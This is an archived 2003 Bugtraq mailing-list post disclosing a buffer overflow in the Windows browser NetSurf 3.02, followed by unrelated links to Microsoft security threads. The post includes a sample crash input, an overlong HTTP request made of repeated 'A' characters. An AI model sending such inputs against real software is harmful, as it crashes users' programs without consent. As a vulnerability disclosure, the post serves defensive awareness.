Buffer Overflow in NetSurf 3.02

From: Q?=nimberQ=20?= (nimber_at_mail.ru)
Date: 08/11/03

  • Next message: root_at_networkpenetration.com: "Subnet Bandwidth Management (SBM) Protocol subject to attack via the Resource Reservation Protocol (RSVP)"
    To: bugtraq@securityfocus.com
    Date: Mon, 11 Aug 2003 22:26:23 +0400
    
    

    #################################
    # ZUD SECURITY TEAM PRESENT #
    ################################
    # bug found by nimber #
    # Email : nimber@designer.ru #
    # Site: www.zudteam.org #
    # HomePage: www.nimber.plux.ru #
    # 7.08.2003 #
    ################################
    Application: NetSurf
    Versions: 3.02 (and all?)
    Platform: Windows
    Web Site: www.klodware.narod.ru
              www.klodware.nm.ru
    Bug: Buffer Overflow.
    Exploit(exaple):
    Crash browser by sending long http request.
    http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    #################################
    #Fix: Download new version. #
    ################################


  • Next message: root_at_networkpenetration.com: "Subnet Bandwidth Management (SBM) Protocol subject to attack via the Resource Reservation Protocol (RSVP)"

    Relevant Pages

    • [NT] Vulnerability in HTML Help Allows Code Execution (MS05-001)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... * Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ...
      (Securiteam)
    • Need details from users having problems with KB835732
      ... Internet Explorer 6 Service Pack 1 Web site ... Successful Saturday, April 17, 2004 814078: ... Update (Microsoft Jscript version 5.6, Windows 2000, ... Successful Wednesday, April 14, 2004 Security Update for ...
      (microsoft.public.win2000.windows_update)
    • critical updates
      ... Failed Sunday, June 08, 2003 331953: Security Update ... Web site ... Failed Sunday, June 08, 2003 Q329441: Critical Update Web ... (Catalog Database Corruption in Microsoft Windows XP) ...
      (microsoft.public.windowsxp.security_admin)
    • @@ Microsoft Security Advisory: Vulnerability in IE - Patch scheduled for Dec. 13, 2005 @@
      ... TrojanDownloader:Win32/Delf.DH is a Trojan downloader that targets Microsoft Windows. ... Web site to the infected computer. ...
      (soc.culture.iranian)
    • Re: computer hi-jacked
      ... can`t get off it at all.it has taken over the" search engine" completely. ... > simple maintenance tasks - think of it like changing the oil in your car, ... > have to be the built-in Windows Firewall of Windows XP. ... > This web site should help you get started at looking through this list: ...
      (microsoft.public.security)

    Loading